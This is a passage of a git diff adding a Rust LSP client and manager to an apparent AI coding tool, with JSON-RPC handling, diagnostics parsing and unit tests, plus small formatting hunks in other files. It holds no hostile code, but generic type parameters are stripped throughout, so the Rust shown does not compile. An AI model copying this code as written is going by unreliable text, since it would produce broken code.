wrapped in a Mutex so `start_receiver_task` and the + /// public `send_*` methods can both hold it. + writer: Option>>>, +} + +impl LspClient { + /// Spawn the server process and return a connected client. The I/O pump + /// task is started in the background. + pub async fn start(config: LspServerConfig) -> anyhow::Result { + let mut cmd = Command::new(&config.command); + cmd.args(&config.args) + .stdin(std::process::Stdio::piped()) + .stdout(std::process::Stdio::piped()) + .stderr(std::process::Stdio::piped()) + .kill_on_drop(true); + + // Inject environment variables + for (k, v) in &config.env { + cmd.env(k, v); + } + + // On Windows, suppress the console window (CREATE_NO_WINDOW = 0x0800_0000). + // tokio::process::Command exposes creation_flags() directly on Windows. + #[cfg(target_os = "windows")] + { + cmd.creation_flags(0x0800_0000u32); + } + + let mut child = cmd.spawn().map_err(|e| { + anyhow::anyhow!("Failed to start LSP server '{}': {}", config.command, e) + })?; + + let stdin = child + .stdin + .take() + .ok_or_else(|| anyhow::anyhow!("LSP server stdin not available"))?; + let stdout = child + .stdout + .take() + .ok_or_else(|| anyhow::anyhow!("LSP server stdout not available"))?; + + let pending: PendingMap = Arc::new(DashMap::new()); + let diagnostics: Arc>> = Arc::new(DashMap::new()); + + let writer = Arc::new(Mutex::new(BufWriter::new(stdin))); + let pending_clone = pending.clone(); + let diagnostics_clone = diagnostics.clone(); + let server_name = config.name.clone(); + + // Consume stderr in the background so the OS pipe buffer never fills up + if let Some(stderr) = child.stderr.take() { + let name = server_name.clone(); + tokio::spawn(async move { + let mut lines = BufReader::new(stderr).lines(); + while let Ok(Some(line)) = lines.next_line().await { + tracing::debug!("[LSP SERVER {}] {}", name, line); + } + }); + } + + // I/O pump: reads messages from stdout and resolves pending requests + // or stores incoming diagnostics. + tokio::spawn(async move { + let mut reader = BufReader::new(stdout); + loop { + match read_message(&mut reader).await { + Ok(msg) => { + dispatch_incoming(msg, &pending_clone, &diagnostics_clone, &server_name); + } + Err(e) => { + tracing::debug!("LSP server {} reader exited: {}", server_name, e); + break; + } + } + } + }); + + Ok(Self { + server_name: config.name.clone(), + server_config: config, + process: Some(child), + request_id: Arc::new(AtomicU64::new(1)), + pending, + diagnostics, + is_initialized: false, + writer: Some(writer), + }) + } + + fn next_id(&self) -> u64 { + self.request_id.fetch_add(1, Ordering::SeqCst) + } + + /// Send a JSON-RPC request and wait for the matching response. + async fn send_request_inner( + &self, + method: &str, + params: serde_json::Value, + ) -> anyhow::Result { + let id = self.next_id(); + let msg = json!({ + "jsonrpc": "2.0", + "id": id, + "method": method, + "params": params, + }); + let body = serde_json::to_string(&msg)?; + + let (tx, rx) = oneshot::channel(); + self.pending.insert(id, tx); + + { + let writer = self + .writer + .as_ref() + .ok_or_else(|| anyhow::anyhow!("LSP client already shut down"))?; + let mut w = writer.lock().await; + send_message(&mut w, &body).await?; + } + + let response = tokio::time::timeout(std::time::Duration::from_secs(30), rx) + .await + .map_err(|_| { + anyhow::anyhow!( + "LSP request '{}' timed out (server: {})", + method, + self.server_name + ) + })? + .map_err(|_| { + anyhow::anyhow!( + "LSP request '{}' channel closed (server: {})", + method, + self.server_name + ) + })?; + + if let Some(err) = response.get("error") { + return Err(anyhow::anyhow!( + "LSP error from {}: {}", + self.server_name, + err + )); + } + Ok(response["result"].clone()) + } + + /// Send a JSON-RPC notification (fire-and-forget, no response expected). + async fn send_notification_inner( + &self, + method: &str, + params: serde_json::Value, + ) -> anyhow::Result<()> { + let msg = json!({ + "jsonrpc": "2.0", + "method": method, + "params": params, + }); + let body = serde_json::to_string(&msg)?; + let writer = self + .writer + .as_ref() + .ok_or_else(|| anyhow::anyhow!("LSP client already shut down"))?; + let mut w = writer.lock().await; + send_message(&mut w, &body).await + } + + /// Perform the LSP `initialize` / `initialized` handshake. + pub async fn initialize(&mut self, root_uri: &str) -> anyhow::Result<()> { + let params = json!({ + "processId": std::process::id(), + "clientInfo": { "name": "coven-code", "version": "1.0" }, + "rootUri": root_uri, + "capabilities": { + "textDocument": { + "publishDiagnostics": { + "relatedInformation": true, + "versionSupport": false, + "codeDescriptionSupport": false + }, + "synchronization": { + "dynamicRegistration": false, + "willSave": false, + "willSaveWaitUntil": false, + "didSave": true + } + }, + "workspace": { + "configuration": false, + "didChangeConfiguration": { "dynamicRegistration": false } + } + }, + "initializationOptions": self.server_config.initialization_options, + }); + + self.send_request_inner("initialize", params).await?; + + // Send the `initialized` notification to complete the handshake + self.send_notification_inner("initialized", json!({})) + .await?; + + self.is_initialized = true; + tracing::debug!("LSP server '{}' initialized", self.server_name); + Ok(()) + } + + /// Notify the server that a document has been opened. + pub async fn open_document( + &mut self, + uri: &str, + language_id: &str, + content: &str, + ) -> anyhow::Result<()> { + self.send_notification_inner( + "textDocument/didOpen", + json!({ + "textDocument": { + "uri": uri, + "languageId": language_id, + "version": 1, + "text": content, + } + }), + ) + .await + } + + /// Notify the server that a document has been changed. + pub async fn change_document( + &mut self, + uri: &str, + content: &str, + version: i64, + ) -> anyhow::Result<()> { + self.send_notification_inner( + "textDocument/didChange", + json!({ + "textDocument": { "uri": uri, "version": version }, + "contentChanges": [{ "text": content }], + }), + ) + .await + } + + /// Notify the server that a document has been saved. + pub async fn save_document(&mut self, uri: &str) -> anyhow::Result<()> { + self.send_notification_inner( + "textDocument/didSave", + json!({ "textDocument": { "uri": uri } }), + ) + .await + } + + /// Notify the server that a document has been closed. + pub async fn close_document(&mut self, uri: &str) -> anyhow::Result<()> { + self.send_notification_inner( + "textDocument/didClose", + json!({ "textDocument": { "uri": uri } }), + ) + .await + } + + /// Get hover information at a position (1-based line/column). + pub async fn hover( + &self, + uri: &str, + line: u32, + character: u32, + ) -> anyhow::Result> { + // LSP protocol is 0-based + let result = self + .send_request_inner( + "textDocument/hover", + json!({ + "textDocument": { "uri": uri }, + "position": { + "line": line.saturating_sub(1), + "character": character.saturating_sub(1), + } + }), + ) + .await?; + + if result.is_null() { + return Ok(None); + } + + // The result can be { contents: MarkupContent | MarkedString | MarkedString[] } + let contents = &result["contents"]; + let text = if let Some(value) = contents.get("value").and_then(|v| v.as_str()) { + // MarkupContent { kind, value } + value.to_string() + } else if let Some(s) = contents.as_str() { + // Plain string + s.to_string() + } else if let Some(arr) = contents.as_array() { + // Array of MarkedStrings + arr.iter() + .filter_map(|item| { + item.get("value") + .and_then(|v| v.as_str()) + .or_else(|| item.as_str()) + }) + .collect::>() + .join("\n\n") + } else { + return Ok(None); + }; + + if text.trim().is_empty() { + Ok(None) + } else { + Ok(Some(text)) + } + } + + /// Get definition locations for a position (1-based line/column). + /// Returns a list of `"file_path:line"` strings. + pub async fn definition( + &self, + uri: &str, + line: u32, + character: u32, + ) -> anyhow::Result> { + let result = self + .send_request_inner( + "textDocument/definition", + json!({ + "textDocument": { "uri": uri }, + "position": { + "line": line.saturating_sub(1), + "character": character.saturating_sub(1), + } + }), + ) + .await?; + + Ok(extract_locations(&result)) + } + + /// Get all references for a symbol at a position (1-based line/column). + pub async fn references( + &self, + uri: &str, + line: u32, + character: u32, + ) -> anyhow::Result> { + let result = self + .send_request_inner( + "textDocument/references", + json!({ + "textDocument": { "uri": uri }, + "position": { + "line": line.saturating_sub(1), + "character": character.saturating_sub(1), + }, + "context": { "includeDeclaration": true } + }), + ) + .await?; + + Ok(extract_locations(&result)) + } + + /// List document symbols for a file. + pub async fn document_symbols(&self, uri: &str) -> anyhow::Result> { + let result = self + .send_request_inner( + "textDocument/documentSymbol", + json!({ "textDocument": { "uri": uri } }), + ) + .await?; + + let mut symbols = Vec::new(); + if let serde_json::Value::Array(arr) = &result { + for sym in arr { + collect_symbol(sym, 0, &mut symbols); + } + } + Ok(symbols) + } + + /// Get cached diagnostics for `file_path`. + pub fn get_diagnostics(&self, file_path: &str) -> Vec { + let uri = path_to_uri(file_path); + self.diagnostics + .get(&uri) + .map(|v| v.clone()) + .unwrap_or_default() + } + + /// Get all cached diagnostics across every file. + pub fn all_diagnostics(&self) -> Vec { + self.diagnostics + .iter() + .flat_map(|entry| entry.value().clone()) + .collect() + } + + /// Returns `true` if `initialize` has completed successfully. + pub fn is_initialized(&self) -> bool { + self.is_initialized + } + + /// Gracefully shut down the server. + pub async fn shutdown(&mut self) -> anyhow::Result<()> { + if !self.is_initialized { + return Ok(()); + } + // Attempt graceful shutdown; ignore errors since we kill anyway. + let _ = self.send_request_inner("shutdown", json!(null)).await; + let _ = self.send_notification_inner("exit", json!(null)).await; + + // Drop the writer so the pipe closes cleanly before we wait. + self.writer.take(); + + if let Some(mut child) = self.process.take() { + // Give the process a moment to exit cleanly. + let _ = tokio::time::timeout(std::time::Duration::from_secs(5), child.wait()).await; + let _ = child.kill().await; + } + self.is_initialized = false; + Ok(()) + } +} + +// --------------------------------------------------------------------------- +// Incoming message dispatch +// --------------------------------------------------------------------------- + +fn dispatch_incoming( + msg: serde_json::Value, + pending: &PendingMap, + diagnostics: &Arc>>, + server_name: &str, +) { + // Response to a request we sent + if let Some(id) = msg.get("id").and_then(|v| v.as_u64()) { + if let Some((_, tx)) = pending.remove(&id) { + let _ = tx.send(msg); + } + return; + } + + // Notification or request from the server + if let Some(method) = msg.get("method").and_then(|v| v.as_str()) { + match method { + "textDocument/publishDiagnostics" => { + handle_publish_diagnostics(&msg["params"], diagnostics, server_name); + } + _ => { + tracing::trace!( + "LSP server {}: unhandled notification '{}'", + server_name, + method + ); + } + } + } +} + +fn handle_publish_diagnostics( + params: &serde_json::Value, + diagnostics: &Arc>>, + server_name: &str, +) { + let uri = match params.get("uri").and_then(|v| v.as_str()) { + Some(u) => u.to_string(), + None => return, + }; + + let raw_diags = match params.get("diagnostics").and_then(|v| v.as_array()) { + Some(d) => d, + None => { + diagnostics.insert(uri, Vec::new()); + return; + } + }; + + // Convert the URI back to a file path for storage + let file_path = uri_to_path(&uri); + + let parsed: Vec = raw_diags + .iter() + .filter_map(|d| parse_diagnostic(d, &file_path, server_name)) + .collect(); + + tracing::debug!( + "LSP server {}: {} diagnostics for {}", + server_name, + parsed.len(), + file_path + ); + + diagnostics.insert(uri, parsed); +} + +fn parse_diagnostic( + d: &serde_json::Value, + file_path: &str, + server_name: &str, +) -> Option { + let range = d.get("range")?; + let start = range.get("start")?; + let line = start.get("line")?.as_u64()? as u32 + 1; // LSP is 0-based + let column = start.get("character")?.as_u64()? as u32 + 1; + let message = d.get("message")?.as_str()?.to_string(); + + let severity = d + .get("severity") + .and_then(|v| v.as_u64()) + .map(DiagnosticSeverity::from_lsp_int) + .unwrap_or(DiagnosticSeverity::Error); + + let source = d + .get("source") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + .or_else(|| Some(server_name.to_string())); + + let code = d.get("code").map(|v| match v { + serde_json::Value::String(s) => s.clone(), + serde_json::Value::Number(n) => n.to_string(), + other => other.to_string(), + }); + + Some(LspDiagnostic { + file: file_path.to_string(), + line, + column, + severity, + message, + source, + code, + }) +} + +// --------------------------------------------------------------------------- +// Location / symbol helpers +// --------------------------------------------------------------------------- + +/// Extract a list of `"path:line"` strings from an LSP `Location | Location[]` result. +fn extract_locations(result: &serde_json::Value) -> Vec { + let items: Vec<&serde_json::Value> = if let Some(arr) = result.as_array() { + arr.iter().collect() + } else if result.is_object() { + vec![result] + } else { + return Vec::new(); + }; + + items + .into_iter() + .filter_map(|loc| { + let uri = loc.get("uri")?.as_str()?; + let line = loc + .pointer("/range/start/line") + .and_then(|v| v.as_u64()) + .unwrap_or(0) + + 1; // convert to 1-based + let col = loc + .pointer("/range/start/character") + .and_then(|v| v.as_u64()) + .unwrap_or(0) + + 1; + let path = uri_to_path(uri); + Some(format!("{}:{}:{}", path, line, col)) + }) + .collect() +} + +/// Recursively collect symbol names from a DocumentSymbol or SymbolInformation node. +fn collect_symbol(sym: &serde_json::Value, depth: usize, out: &mut Vec) { + let indent = " ".repeat(depth); + let name = sym + .get("name") + .and_then(|n| n.as_str()) + .unwrap_or(""); + let kind = sym.get("kind").and_then(|k| k.as_u64()).unwrap_or(0); + let kind_str = symbol_kind_name(kind); + out.push(format!("{}{} ({})", indent, name, kind_str)); + + // DocumentSymbol may have nested children + if let Some(children) = sym.get("children").and_then(|c| c.as_array()) { + for child in children { + collect_symbol(child, depth + 1, out); + } + } +} + +fn symbol_kind_name(kind: u64) -> &'static str { + match kind { + 1 => "file", + 2 => "module", + 3 => "namespace", + 4 => "package", + 5 => "class", + 6 => "method", + 7 => "property", + 8 => "field", + 9 => "constructor", + 10 => "enum", + 11 => "interface", + 12 => "function", + 13 => "variable", + 14 => "constant", + 15 => "string", + 16 => "number", + 17 => "boolean", + 18 => "array", + 19 => "object", + 20 => "key", + 21 => "null", + 22 => "enum-member", + 23 => "struct", + 24 => "event", + 25 => "operator", + 26 => "type-parameter", + _ => "symbol", + } +} + +// --------------------------------------------------------------------------- +// URI helpers +// --------------------------------------------------------------------------- + +fn path_to_uri(path: &str) -> String { + // Simple heuristic; for full correctness callers should pass pre-formed URIs + if path.starts_with("file://") { + return path.to_string(); + } + let canonical = std::fs::canonicalize(path).unwrap_or_else(|_| std::path::PathBuf::from(path)); + let s = canonical.to_string_lossy(); + if cfg!(target_os = "windows") { + // Drive letters need a leading slash: file:///C:/... + format!("file:///{}", s.replace('\\', "/")) + } else { + format!("file://{}", s) + } +} + +fn uri_to_path(uri: &str) -> String { + let stripped = uri + .strip_prefix("file:///") + .or_else(|| uri.strip_prefix("file://")) + .unwrap_or(uri); + if cfg!(target_os = "windows") { + stripped.replace('/', "\\") + } else { + stripped.to_string() + } +} + +// --------------------------------------------------------------------------- +// Diagnostic formatting (shared utility) +// --------------------------------------------------------------------------- + +impl LspManager { + /// Format a slice of diagnostics into a human-readable multi-line string + /// suitable for inclusion in tool output or TUI display. + pub fn format_diagnostics(diagnostics: &[LspDiagnostic]) -> String { + if diagnostics.is_empty() { + return "No diagnostics.".to_string(); + } + diagnostics + .iter() + .map(|d| { + format!( + "[{}] {}:{}:{} - {}{}{}", + d.severity.as_str().to_uppercase(), + d.file, + d.line, + d.column, + d.message, + d.source + .as_deref() + .map(|s| format!(" ({})", s)) + .unwrap_or_default(), + d.code + .as_deref() + .map(|c| format!(" [{}]", c)) + .unwrap_or_default(), + ) + }) + .collect::>() + .join("\n") + } +} + +// --------------------------------------------------------------------------- +// LspManager — registry and multi-server coordination +// --------------------------------------------------------------------------- + +/// Manages a collection of [`LspClient`] instances, routing file operations +/// to the correct server based on extension mappings. +pub struct LspManager { + /// Registered configs (used for lookup before a client is started) + configs: Vec, + /// Running clients keyed by server name + clients: HashMap, + /// Map of file extension → list of server names that handle it + extension_map: HashMap>, + /// Set of file URIs that have been opened on a specific server (URI → server name) + opened_files: HashMap, +} + +impl LspManager { + pub fn new() -> Self { + Self { + configs: Vec::new(), + clients: HashMap::new(), + extension_map: HashMap::new(), + opened_files: HashMap::new(), + } + } + + /// Register an LSP server configuration. + pub fn register_server(&mut self, config: LspServerConfig) { + // Build extension → server mapping + for ext in config.extension_to_language.keys() { + let normalized = ext.to_lowercase(); + self.extension_map + .entry(normalized) + .or_default() + .push(config.name.clone()); + } + // Also handle glob patterns like "*.rs" → ".rs" + for pattern in &config.file_patterns { + if let Some(ext) = pattern.strip_prefix("*.") { + let normalized = format!(".{}", ext.to_lowercase()); + let entry = self.extension_map.entry(normalized).or_default(); + if !entry.contains(&config.name) { + entry.push(config.name.clone()); + } + } + } + self.configs.push(config); + } + + /// Return all registered server configurations. + pub fn servers(&self) -> &[LspServerConfig] { + &self.configs + } + + /// Look up a server configuration by name. + pub fn server_by_name(&self, name: &str) -> Option<&LspServerConfig> { + self.configs.iter().find(|s| s.name == name) + } + + /// Public wrapper: find the first server name that handles `file_path` based on extension. + /// Returns `None` when no server is configured for the file's extension. + pub fn server_name_for_file_pub(&self, file_path: &str) -> Option<&str> { + self.server_name_for_file(file_path) + } + + /// Find the first server name that handles `file_path` based on extension. + fn server_name_for_file(&self, file_path: &str) -> Option<&str> { + let ext = Path::new(file_path) + .extension() + .and_then(|e| e.to_str()) + .map(|e| format!(".{}", e.to_lowercase())) + .unwrap_or_default(); + self.extension_map + .get(&ext) + .and_then(|names| names.first()) + .map(|s| s.as_str()) + } + + /// Spawn and initialize the server for `file_path` if it is not already + /// running. Returns `None` when no server is configured for this file type. + async fn ensure_started( + &mut self, + file_path: &str, + root_dir: &Path, + ) -> anyhow::Result> { + let server_name = match self.server_name_for_file(file_path) { + Some(n) => n.to_string(), + None => return Ok(None), + }; + + if !self.clients.contains_key(&server_name) { + let config = match self.configs.iter().find(|c| c.name == server_name) { + Some(c) => c.clone(), + None => return Ok(None), + }; + match LspClient::start(config).await { + Ok(mut client) => { + let root_uri = path_to_uri(&root_dir.to_string_lossy()); + if let Err(e) = client.initialize(&root_uri).await { + tracing::warn!("Failed to initialize LSP server '{}': {}", server_name, e); + // Don't insert — allow retry on next call + return Ok(None); + } + self.clients.insert(server_name.clone(), client); + } + Err(e) => { + tracing::warn!("Failed to start LSP server '{}': {}", server_name, e); + return Ok(None); + } + } + } + + Ok(self.clients.get_mut(&server_name)) + } + + /// Spawn and initialize servers for all registered configurations. + pub async fn start_servers(&mut self, root_dir: &Path) { + let configs: Vec = self.configs.clone(); + for config in configs { + let name = config.name.clone(); + if self.clients.contains_key(&name) { + continue; + } + match LspClient::start(config).await { + Ok(mut client) => { + let root_uri = path_to_uri(&root_dir.to_string_lossy()); + if let Err(e) = client.initialize(&root_uri).await { + tracing::warn!("Failed to initialize LSP server '{}': {}", name, e); + continue; + } + self.clients.insert(name.clone(), client); + tracing::info!("LSP server '{}' started", name); + } + Err(e) => { + tracing::warn!("Failed to start LSP server '{}': {}", name, e); + } + } + } + } + + /// Open a file on the appropriate LSP server. + pub async fn open_file(&mut self, file_path: &str, root_dir: &Path) -> anyhow::Result<()> { + let uri = path_to_uri(file_path); + let server_name = match self.server_name_for_file(file_path) { + Some(n) => n.to_string(), + None => return Ok(()), + }; + + // Skip if already opened on this server + if self.opened_files.get(&uri).map(|s| s.as_str()) == Some(server_name.as_str()) { + return Ok(()); + } + + let content = match tokio::fs::read_to_string(file_path).await { + Ok(c) => c, + Err(e) => { + return Err(anyhow::anyhow!( + "Cannot read '{}' for LSP: {}", + file_path, + e + )) + } + }; + + // Ensure the server is running first (borrows self mutably, so must + // finish before we borrow opened_files). + self.ensure_started(file_path, root_dir).await?; + + if let Some(client) = self.clients.get_mut(&server_name) { + let lang = client.server_config.language_for_file(file_path); + client.open_document(&uri, &lang, &content).await?; + self.opened_files.insert(uri, server_name); + } + Ok(()) + } + + /// Register all servers from a config slice if not already registered. + /// Idempotent: servers already present by name are skipped. + pub fn seed_from_config(&mut self, configs: &[LspServerConfig]) { + for cfg in configs { + if !self.configs.iter().any(|c| c.name == cfg.name) { + self.register_server(cfg.clone()); + } + } + } + + /// Get hover information for `file_path` at the given 1-based position. + pub async fn hover( + &mut self, + file_path: &str, + root_dir: &Path, + line: u32, + character: u32, + ) -> anyhow::Result> { + let uri = path_to_uri(file_path); + let server_name = self + .server_name_for_file(file_path) + .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))? + .to_string(); + self.ensure_started(file_path, root_dir).await?; + let client = self + .clients + .get(&server_name) + .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; + client.hover(&uri, line, character).await + } + + /// Get definition locations for `file_path` at the given 1-based position. + pub async fn definition( + &mut self, + file_path: &str, + root_dir: &Path, + line: u32, + character: u32, + ) -> anyhow::Result> { + let uri = path_to_uri(file_path); + let server_name = self + .server_name_for_file(file_path) + .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))? + .to_string(); + self.ensure_started(file_path, root_dir).await?; + let client = self + .clients + .get(&server_name) + .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; + client.definition(&uri, line, character).await + } + + /// Get references for a symbol in `file_path` at the given 1-based position. + pub async fn references( + &mut self, + file_path: &str, + root_dir: &Path, + line: u32, + character: u32, + ) -> anyhow::Result> { + let uri = path_to_uri(file_path); + let server_name = self + .server_name_for_file(file_path) + .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))? + .to_string(); + self.ensure_started(file_path, root_dir).await?; + let client = self + .clients + .get(&server_name) + .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; + client.references(&uri, line, character).await + } + + /// List document symbols for `file_path`. + pub async fn document_symbols( + &mut self, + file_path: &str, + root_dir: &Path, + ) -> anyhow::Result> { + let uri = path_to_uri(file_path); + let server_name = self + .server_name_for_file(file_path) + .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))? + .to_string(); + self.ensure_started(file_path, root_dir).await?; + let client = self + .clients + .get(&server_name) + .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; + client.document_symbols(&uri).await + } + + /// Get cached diagnostics for `file_path` across all running servers. + pub fn get_diagnostics_for_file(&self, file_path: &str) -> Vec { + self.clients + .values() + .flat_map(|c| c.get_diagnostics(file_path)) + .collect() + } + + /// Get all cached diagnostics from all running servers. + pub fn all_diagnostics(&self) -> Vec { + self.clients + .values() + .flat_map(|c| c.all_diagnostics()) + .collect() + } + + /// Shut down all running servers. + pub async fn shutdown_all(&mut self) { + let names: Vec = self.clients.keys().cloned().collect(); + for name in names { + if let Some(mut client) = self.clients.remove(&name) { + if let Err(e) = client.shutdown().await { + tracing::warn!("Error shutting down LSP server '{}': {}", name, e); + } + } + } + self.opened_files.clear(); + } + + /// Get a legacy-compatible async diagnostic query (returns cached results). + pub async fn get_diagnostics(&self, file: &str) -> Vec { + self.get_diagnostics_for_file(file) + } +} + +impl Default for LspManager { + fn default() -> Self { + Self::new() + } +} + +// --------------------------------------------------------------------------- +// Global singleton +// --------------------------------------------------------------------------- + +use once_cell::sync::Lazy; + +static GLOBAL_LSP_MANAGER: Lazy>> = + Lazy::new(|| Arc::new(tokio::sync::Mutex::new(LspManager::new()))); + +/// Access the global [`LspManager`] instance. +pub fn global_lsp_manager() -> Arc> { + GLOBAL_LSP_MANAGER.clone() +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + fn make_config(name: &str) -> LspServerConfig { + LspServerConfig { + name: name.to_string(), + command: name.to_string(), + args: vec![], + file_patterns: vec!["*.rs".to_string()], + initialization_options: None, + extension_to_language: { + let mut m = HashMap::new(); + m.insert(".rs".to_string(), "rust".to_string()); + m + }, + env: HashMap::new(), + } + } + + fn make_diagnostic( + file: &str, + line: u32, + col: u32, + severity: DiagnosticSeverity, + message: &str, + ) -> LspDiagnostic { + LspDiagnostic { + file: file.to_string(), + line, + column: col, + severity, + message: message.to_string(), + source: None, + code: None, + } + } + + #[test] + fn test_new_manager_empty() { + let mgr = LspManager::new(); + assert!(mgr.servers().is_empty()); + } + + #[test] + fn test_register_server() { + let mut mgr = LspManager::new(); + mgr.register_server(make_config("rust-analyzer")); + assert_eq!(mgr.servers().len(), 1); + assert_eq!(mgr.servers()[0].name, "rust-analyzer"); + } + + #[test] + fn test_register_multiple_servers() { + let mut mgr = LspManager::new(); + mgr.register_server(make_config("rust-analyzer")); + mgr.register_server(make_config("pyright")); + assert_eq!(mgr.servers().len(), 2); + } + + #[test] + fn test_server_by_name_found() { + let mut mgr = LspManager::new(); + mgr.register_server(make_config("rust-analyzer")); + mgr.register_server(make_config("pyright")); + let s = mgr.server_by_name("pyright"); + assert!(s.is_some()); + assert_eq!(s.unwrap().name, "pyright"); + } + + #[test] + fn test_server_by_name_not_found() { + let mgr = LspManager::new(); + assert!(mgr.server_by_name("missing").is_none()); + } + + #[tokio::test] + async fn test_get_diagnostics_empty_when_no_servers() { + let mgr = LspManager::new(); + let diags = mgr.get_diagnostics("src/main.rs").await; + assert!(diags.is_empty()); + } + + #[test] + fn test_format_diagnostics_empty() { + let result = LspManager::format_diagnostics(&[]); + assert_eq!(result, "No diagnostics."); + } + + #[test] + fn test_format_diagnostics_single_error() { + let diags = vec![make_diagnostic( + "src/lib.rs", + 10, + 5, + DiagnosticSeverity::Error, + "type mismatch", + )]; + let result = LspManager::format_diagnostics(&diags); + assert!(result.contains("[ERROR]")); + assert!(result.contains("src/lib.rs")); + assert!(result.contains("10:5")); + assert!(result.contains("type mismatch")); + } + + #[test] + fn test_format_diagnostics_multiple() { + let diags = vec![ + make_diagnostic("a.rs", 1, 1, DiagnosticSeverity::Error, "err1"), + make_diagnostic("b.rs", 2, 3, DiagnosticSeverity::Warning, "warn1"), + ]; + let result = LspManager::format_diagnostics(&diags); + let lines: Vec<&str> = result.lines().collect(); + assert_eq!(lines.len(), 2); + assert!(lines[0].contains("[ERROR]")); + assert!(lines[1].contains("[WARNING]")); + } + + #[test] + fn test_format_diagnostics_with_source_and_code() { + let mut d = make_diagnostic( + "main.rs", + 5, + 1, + DiagnosticSeverity::Error, + "mismatched types", + ); + d.source = Some("rust-analyzer".to_string()); + d.code = Some("E0308".to_string()); + let result = LspManager::format_diagnostics(&[d]); + assert!(result.contains("(rust-analyzer)"), "result = {}", result); + assert!(result.contains("[E0308]"), "result = {}", result); + } + + #[test] + fn test_diagnostic_severity_ordering() { + assert!(DiagnosticSeverity::Error < DiagnosticSeverity::Warning); + assert!(DiagnosticSeverity::Warning < DiagnosticSeverity::Information); + assert!(DiagnosticSeverity::Information < DiagnosticSeverity::Hint); + } + + #[test] + fn test_diagnostic_severity_as_str() { + assert_eq!(DiagnosticSeverity::Error.as_str(), "error"); + assert_eq!(DiagnosticSeverity::Warning.as_str(), "warning"); + assert_eq!(DiagnosticSeverity::Information.as_str(), "info"); + assert_eq!(DiagnosticSeverity::Hint.as_str(), "hint"); + } + + #[test] + fn test_lsp_server_config_serialization() { + let cfg = make_config("rust-analyzer"); + let json = serde_json::to_string(&cfg).unwrap(); + let back: LspServerConfig = serde_json::from_str(&json).unwrap(); + assert_eq!(back.name, "rust-analyzer"); + } + + #[test] + fn test_default_trait() { + let mgr = LspManager::default(); + assert!(mgr.servers().is_empty()); + } + + #[test] + fn test_extension_routing() { + let mut mgr = LspManager::new(); + mgr.register_server(make_config("rust-analyzer")); + // .rs maps to rust-analyzer + assert_eq!( + mgr.server_name_for_file("src/main.rs"), + Some("rust-analyzer") + ); + // .py has no mapping + assert_eq!(mgr.server_name_for_file("app.py"), None); + } + + #[test] + fn test_path_to_uri_roundtrip() { + // On the current platform, converting a relative path to URI and back + // should not panic. + let uri = path_to_uri("src/main.rs"); + assert!( + uri.starts_with("file://"), + "expected file:// URI, got {}", + uri + ); + let _back = uri_to_path(&uri); + } + + #[test] + fn test_language_for_file() { + let cfg = make_config("rust-analyzer"); + assert_eq!(cfg.language_for_file("src/main.rs"), "rust"); + assert_eq!(cfg.language_for_file("README.md"), "plaintext"); + } + + #[test] + fn test_severity_from_lsp_int() { + assert_eq!( + DiagnosticSeverity::from_lsp_int(1), + DiagnosticSeverity::Error + ); + assert_eq!( + DiagnosticSeverity::from_lsp_int(2), + DiagnosticSeverity::Warning + ); + assert_eq!( + DiagnosticSeverity::from_lsp_int(3), + DiagnosticSeverity::Information + ); + assert_eq!( + DiagnosticSeverity::from_lsp_int(4), + DiagnosticSeverity::Hint + ); + assert_eq!( + DiagnosticSeverity::from_lsp_int(99), + DiagnosticSeverity::Hint + ); + } + + #[test] + fn test_global_lsp_manager_consistent() { + let m1 = global_lsp_manager(); + let m2 = global_lsp_manager(); + assert!(Arc::ptr_eq(&m1, &m2)); + } + + #[test] + fn test_parse_diagnostic_valid() { + let raw = serde_json::json!({ + "range": { + "start": { "line": 4, "character": 2 }, + "end": { "line": 4, "character": 10 } + }, + "severity": 1, + "message": "type mismatch", + "source": "rust-analyzer", + "code": "E0308" + }); + let d = parse_diagnostic(&raw, "src/main.rs", "rust-analyzer").unwrap(); + assert_eq!(d.line, 5); // 0-based → 1-based + assert_eq!(d.column, 3); + assert_eq!(d.message, "type mismatch"); + assert_eq!(d.severity, DiagnosticSeverity::Error); + assert_eq!(d.code.as_deref(), Some("E0308")); + } + + #[test] + fn test_parse_diagnostic_missing_range_returns_none() { + let raw = serde_json::json!({ "message": "oops" }); + assert!(parse_diagnostic(&raw, "f.rs", "lsp").is_none()); + } +} diff --git a/src-rust/crates/core/src/mcp_templates.rs b/src-rust/crates/core/src/mcp_templates.rs index 54f30c6..8ddfa5c 100644 --- a/src-rust/crates/core/src/mcp_templates.rs +++ b/src-rust/crates/core/src/mcp_templates.rs @@ -58,10 +58,7 @@ impl TemplateRenderer { pos = start + replacement.len(); } else { // Variable not found, leave as-is and skip past it - debug!( - "Template variable not found in context: {}", - var_name - ); + debug!("Template variable not found in context: {}", var_name); pos = end + 2; } } @@ -125,8 +122,7 @@ mod tests { "name": "Database", "description": "Query operations" }); - let result = - TemplateRenderer::render("Use {{name}} for {{description}}", &context); + let result = TemplateRenderer::render("Use {{name}} for {{description}}", &context); assert_eq!(result, "Use Database for Query operations"); } @@ -138,10 +134,8 @@ mod tests { "version": "1.0" } }); - let result = TemplateRenderer::render( - "Created by {{meta.author}} (v{{meta.version}})", - &context, - ); + let result = + TemplateRenderer::render("Created by {{meta.author}} (v{{meta.version}})", &context); assert_eq!(result, "Created by Alice (v1.0)"); } @@ -168,10 +162,7 @@ mod tests { "count": 42, "enabled": true }); - let result = TemplateRenderer::render( - "Count: {{count}}, Enabled: {{enabled}}", - &context, - ); + let result = TemplateRenderer::render("Count: {{count}}, Enabled: {{enabled}}", &context); assert_eq!(result, "Count: 42, Enabled: true"); } diff --git a/src-rust/crates/core/src/memdir.rs b/src-rust/crates/core/src/memdir.rs index f174be2..2d082ea 100644 --- a/src-rust/crates/core/src/memdir.rs +++ b/src-rust/crates/core/src/memdir.rs @@ -1,879 +1,895 @@ -//! Memory directory (memdir) system. -//! -//! Provides persistent, file-based memory across sessions. 